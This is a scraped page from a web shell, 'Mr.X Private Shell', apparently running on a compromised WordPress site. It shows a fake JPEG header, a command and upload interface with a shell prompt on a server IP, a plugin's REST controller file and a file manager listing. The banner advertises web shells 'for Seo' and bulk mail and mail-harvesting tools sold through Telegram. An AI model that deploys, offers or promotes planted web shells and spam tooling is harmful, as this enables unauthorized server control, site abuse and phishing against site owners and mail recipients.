����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
namespace WordPressPopularPosts\Rest;

class Controller {

    /**
     * Posts Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\PostsEndpoint
     * @access  private
     */
    private $posts_endpoint;

    /**
     * View Logger Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\ViewLoggerEndpoint
     * @access  private
     */
    private $view_logger_endpoint;

    /**
     * View Logger Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\WidgetEndpoint
     * @access  private
     */
    private $widget_endpoint;

    /**
     * Themes Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\ThemesEndpoint
     * @access  private
     */
    private $themes_endpoint;

    /**
     * Themes Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\ThumbnailsEndpoint
     * @access  private
     */
    private $thumbnails_endpoint;

    /**
     * Themes Endpoint.
     *
     * @var     \WordPressPopularPosts\Rest\TaxonomiesEndpoint
     * @access  private
     */
    private $taxonomies_endpoint;

    /**
     * Initialize class.
     *
     * @param   \WordPressPopularPosts\Rest\PostsEndpoint
     * @param   \WordPressPopularPosts\Rest\ViewLoggerEndpoint
     * @param   \WordPressPopularPosts\Rest\WidgetEndpoint
     * @param   \WordPressPopularPosts\Rest\ThemesEndpoint
     * @param   \WordPressPopularPosts\Rest\ThumbnailsEndpoint
     * @param   \WordPressPopularPosts\Rest\TaxonomiesEndpoint
     */
    public function __construct(PostsEndpoint $posts_endpoint, ViewLoggerEndpoint $view_logger_endpoint, WidgetEndpoint $widget_endpoint, ThemesEndpoint $themes_endpoint, ThumbnailsEndpoint $thumbnails_endpoint, TaxonomiesEndpoint $taxonomies_endpoint)
    {
        $this->posts_endpoint = $posts_endpoint;
        $this->view_logger_endpoint = $view_logger_endpoint;
        $this->widget_endpoint = $widget_endpoint;
        $this->themes_endpoint = $themes_endpoint;
        $this->thumbnails_endpoint = $thumbnails_endpoint;
        $this->taxonomies_endpoint = $taxonomies_endpoint;
    }

    /**
     * WordPress hooks.
     *
     * @since   5.0.0
     */
    public function hooks()
    {
        add_action('rest_api_init', [$this, 'register_routes']);
    }

    /**
     * Registers REST endpoints.
     */
    public function register_routes()
    {
        $this->posts_endpoint->register();
        $this->view_logger_endpoint->register();
        $this->widget_endpoint->register();
        $this->themes_endpoint->register();
        $this->thumbnails_endpoint->register();
        $this->taxonomies_endpoint->register();
    }
}

Filemanager

Name Type Size Permission Actions
Controller.php File 2.66 KB 0644
Endpoint.php File 1.75 KB 0644
PostsEndpoint.php File 8.65 KB 0644
TaxonomiesEndpoint.php File 1.03 KB 0644
ThemesEndpoint.php File 1.66 KB 0644
ThumbnailsEndpoint.php File 1.95 KB 0644
ViewLoggerEndpoint.php File 13.04 KB 0644
WidgetEndpoint.php File 3.02 KB 0644